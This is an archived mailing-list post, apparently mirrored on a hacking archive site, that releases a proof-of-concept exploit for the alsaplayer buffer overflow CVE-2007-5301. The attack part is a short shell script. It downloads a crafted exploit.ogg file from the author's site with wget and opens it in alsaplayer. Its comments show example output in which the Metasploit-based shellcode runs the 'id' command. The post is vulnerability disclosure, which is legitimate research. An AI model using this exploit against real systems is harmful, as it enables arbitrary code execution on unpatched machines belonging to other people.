AOH :: HP Unsorted A :: BX2734.HTM

alsaplayer PoC - exploit



alsaplayer PoC - exploit
alsaplayer PoC - exploit




--=-ZqOBVqsYuekWYMws/h0k
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

Hello,

I have released this PoC for the alsaplayer bug CVE-2007-5301.

You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ 

#!/bin/sh
#
# http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh 
#
# Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package 
# alsaplayer-common at version 0.99.76-9
#
# CVE-2007-5301 / DSA-1538
# 
# by Albert Sellar=C3=A8s  - http://www.wekk.net 
# 2008-04-09
#
# Shellcode is based on metasploit framework. If you want to test it in other 
# systems, maybe you have to recalculate offsets.
#
# Example:
# 
# whats@debian:~$ ./CVE-2007-5301-exploit.sh
# Alsaplayer buffer overflow < 0.99.80-rc3
# by Albert Sellar=C3=A8s  - http://www.wekk.net 
#
#
# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg 
#            => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90 
# Connecting to www.wekk.net|64.22.71.90|:80... connected. 
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
# 
# 100%[===============================================================================>] 5,421 
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
#

echo -e "Alsaplayer buffer overflow < 0.99.80-rc3"
echo -e "by Albert Sellar=C3=A8s  - http://www.wekk.net\n\n" 
wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg 
alsaplayer exploit.ogg



-- 
  Albert Sellar=C3=A8s        GPG id: 0x13053FFE
http://www.wekk.net whats_up@jabber.org 
Membre de Catux.org http://catux.org 
  Linux User: 324456     Catalunya           


--=-ZqOBVqsYuekWYMws/h0k
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: =?ISO-8859-1?Q?Aix=F2?= =?ISO-8859-1?Q?_=E9s?= una part
	d'un missatge, signada digitalment

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQBH/QnDK3eYPRMFP/4RAjxqAJ9wNRzc6HNQ4PWPtD4mIC+TJsNeXQCdGps/
djfy40vEb+X+24B6wUEecyM=7CDF
-----END PGP SIGNATURE-----

--=-ZqOBVqsYuekWYMws/h0k--


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.